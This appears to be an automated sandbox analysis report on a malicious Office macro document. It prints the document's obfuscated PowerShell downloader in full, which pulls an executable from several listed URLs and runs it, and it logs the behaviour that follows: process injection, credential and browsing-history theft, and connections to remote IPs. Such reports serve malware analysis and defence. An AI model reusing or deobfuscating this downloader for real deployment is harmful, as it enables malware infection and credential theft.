VTI Score
100 / 100
|
|
VTI Database Version | 2.6 |
VTI Rule Match Count | 24 |
VTI Rule Type | Documents |
Injection | Write into memory of a process running from a created or modified executable |
|
|
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
|
|||
Injection | Modify control flow of a process running from a created or modified executable |
|
|
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
|
|||
Process | Create process |
|
|
Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ".
|
|||
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
|||
Create process "C:\Users\Public\3292.exe".
|
|||
Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe".
|
|||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"".
|
|||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"".
|
|||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"".
|
|||
Information Stealing | Read browser data |
|
|
Possibly trying to readout browser credentials.
|
|||
File System | Handle with malicious files |
|
|
File "c:\users\public\3292.exe" is a known malicious file.
|
|||
Network | Download data |
|
|
URL "www.indpts.com/UHSD/".
|
|||
URL "173.201.20.6".
|
|||
URL "159.203.94.198".
|
|||
Network | Perform DNS request |
|
|
Resolve host name "www.indpts.com".
|
|||
Browser | Read data related to browsing history |
|
|
Read the browsing history for "Microsoft Internet Explorer".
|
|||
Network | Connect to remote host |
|
|
Outgoing TCP connection to host "108.163.227.35:80".
|
|||
PE | Execute dropped PE file |
|
|
Execute dropped file "c:\users\public\3292.exe".
|
|||
Network | Connect to HTTP server |
|
|
URL "173.201.20.6".
|
|||
URL "159.203.94.198".
|
|||
URL "www.indpts.com/UHSD/".
|
|||
PE | Drop PE file |
|
|
Drop file "c:\users\public\3292.exe".
|
|||
VBA Macro | Execute application |
|
|
VBA.Shell$ QiiPPcnDM, 0
|
|||
Process | Create system object |
|
|
Create mutex with name "Global\.net clr networking".
|
|||
Create mutex with name "Global\I705BA84C".
|
|||
Create mutex with name "Global\M705BA84C".
|
|||
VBA Macro | Execute macro on specific worksheet event |
|
|
Execute macro on "Activate Workbook" event.
|